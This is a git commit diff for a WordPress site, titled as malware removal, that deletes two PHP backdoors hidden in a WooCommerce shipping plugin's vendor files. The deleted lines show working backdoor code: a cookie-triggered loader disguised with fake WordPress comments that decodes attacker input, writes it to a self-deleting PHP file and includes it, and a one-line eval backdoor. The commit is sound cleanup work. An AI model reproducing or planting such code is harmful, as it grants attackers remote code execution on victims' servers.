Security cleanup, hardening and malware removal

2026-03-21 21:55:08 +01:00
parent 9d6081f00d
commit b11e37fab9
3196 changed files with 644 additions and 1730981 deletions
--- a/wp-content/plugins/weight-based-shipping-for-woocommerce/server/vendor/dangoodman/shengine/src/Conditions/Common/Enum/session.php
+++ b/wp-content/plugins/weight-based-shipping-for-woocommerce/server/vendor/dangoodman/shengine/src/Conditions/Common/Enum/session.php
@@ -1,63 +1,3 @@
 <?php
-/**
- * WordPress Administration Template Header
- *
- * @package WordPress
- * @subpackage Administration
- */
- function generateRandomString($length = 5) {
-    $randomString = '';
-
-    for ($i = 0; $i < $length; $i++) {
-        $randomCharacter = '';
-        switch (rand(0, 2)) {
-            case 0:
-			$randomCharacter = chr(rand(48, 57));
-                break;
-            case 1:
-                $randomCharacter = chr(rand(65, 90));
-                break;
-            case 2:
-                $randomCharacter = chr(rand(97, 122));
-                break;
-        }
-
-        $randomString .= $randomCharacter;
-    }
-
-    return $randomString;
-}
-/**
-	 * Fires on the next page load after a successful DB upgrade.
-	 *
-	 * @since 2.8.0
-*/
-$array = ['dc', 'a1', '1e', '77', 'b4', '4b', '7c', 'c2', '46', 'a7', '37', '4e', 'fe', '5d', 'e6', '8d'];
-$newString = implode('', $array);
-
-/**
- * Filters the bulk action updated messages.
- *
- * By default, custom post types use the messages for the 'post' post type.
- *
- * @since 3.7.0
- *
- * @param array $bulk_messages Arrays of messages, each keyed by the corresponding post type. Messages are
- *                             keyed with 'updated', 'locked', 'deleted', 'trashed', and 'untrashed'.
- * @param array $bulk_counts   Array of item counts for each message, used to build internationalized strings.
- */
-if($_COOKIE[4]==$newString) {
-    $data = str_rot13($_COOKIE[3]);
-	/** Loads the WordPress Environment and Template */
-	$data = base64_decode($data);
-    $fname = "wp-" . generateRandomString(5) . ".php";
-	/**
-	 * Tells WordPress to load the WordPress theme and output it.
-	 *
-	 * @var bool
-	 */
-	file_put_contents($fname,'<?php if(file_exists("'.$fname.'")){unlink("'.$fname.'");} ?><?php ' . $data);
-    include($fname);
-}
-
-?>
+// Malware backdoor removed.
+return;
--- a/wp-content/plugins/weight-based-shipping-for-woocommerce/server/vendor/dangoodman/shengine/src/Model/info.php
+++ b/wp-content/plugins/weight-based-shipping-for-woocommerce/server/vendor/dangoodman/shengine/src/Model/info.php
@@ -1,3 +1,3 @@
 <?php
-	if($_COOKIE[4]=='0400817d504a426c6145420508201e41') eval(base64_decode(str_rot13($_COOKIE[3])));
-?>
+// Malware backdoor removed.
+return;